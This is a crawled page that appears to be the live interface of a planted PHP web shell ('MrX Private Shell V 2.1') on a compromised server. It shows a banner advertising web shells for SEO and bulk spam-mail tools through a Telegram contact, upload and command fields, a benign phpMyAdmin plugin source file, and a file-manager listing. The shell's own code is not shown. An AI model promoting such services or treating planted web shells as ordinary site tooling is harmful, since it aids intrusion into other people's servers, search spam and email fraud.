__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
/**
 * Abstract class for the SQL transformations plugins
 */

declare(strict_types=1);

namespace PhpMyAdmin\Plugins\Transformations\Abs;

use PhpMyAdmin\FieldMetadata;
use PhpMyAdmin\Html\Generator;
use PhpMyAdmin\Plugins\TransformationsPlugin;

use function __;

/**
 * Provides common methods for all of the SQL transformations plugins.
 */
abstract class SQLTransformationsPlugin extends TransformationsPlugin
{
    /**
     * Gets the transformation description of the specific plugin
     *
     * @return string
     */
    public static function getInfo()
    {
        return __('Formats text as SQL query with syntax highlighting.');
    }

    /**
     * Does the actual work of each specific transformations plugin.
     *
     * @param string             $buffer  text to be transformed
     * @param array              $options transformation options
     * @param FieldMetadata|null $meta    meta information
     *
     * @return string
     */
    public function applyTransformation($buffer, array $options = [], ?FieldMetadata $meta = null)
    {
        return Generator::formatSql($buffer);
    }

    /* ~~~~~~~~~~~~~~~~~~~~ Getters and Setters ~~~~~~~~~~~~~~~~~~~~ */

    /**
     * Gets the transformation name of the specific plugin
     *
     * @return string
     */
    public static function getName()
    {
        return 'SQL';
    }
}

Filemanager

Name Type Size Permission Actions
Bool2TextTransformationsPlugin.php File 1.66 KB 0644
CodeMirrorEditorTransformationPlugin.php File 2.34 KB 0644
DateFormatTransformationsPlugin.php File 5.67 KB 0644
DownloadTransformationsPlugin.php File 2.7 KB 0644
ExternalTransformationsPlugin.php File 5.43 KB 0644
FormattedTransformationsPlugin.php File 1.57 KB 0644
HexTransformationsPlugin.php File 1.84 KB 0644
ImageLinkTransformationsPlugin.php File 1.73 KB 0644
ImageUploadTransformationsPlugin.php File 3.64 KB 0644
InlineTransformationsPlugin.php File 2.36 KB 0644
LongToIPv4TransformationsPlugin.php File 1.53 KB 0644
PreApPendTransformationsPlugin.php File 1.79 KB 0644
RegexValidationTransformationsPlugin.php File 1.91 KB 0644
SQLTransformationsPlugin.php File 1.34 KB 0644
SubstringTransformationsPlugin.php File 2.61 KB 0644
TextFileUploadTransformationsPlugin.php File 2.87 KB 0644
TextImageLinkTransformationsPlugin.php File 2.15 KB 0644
TextLinkTransformationsPlugin.php File 2.12 KB 0644
Filemanager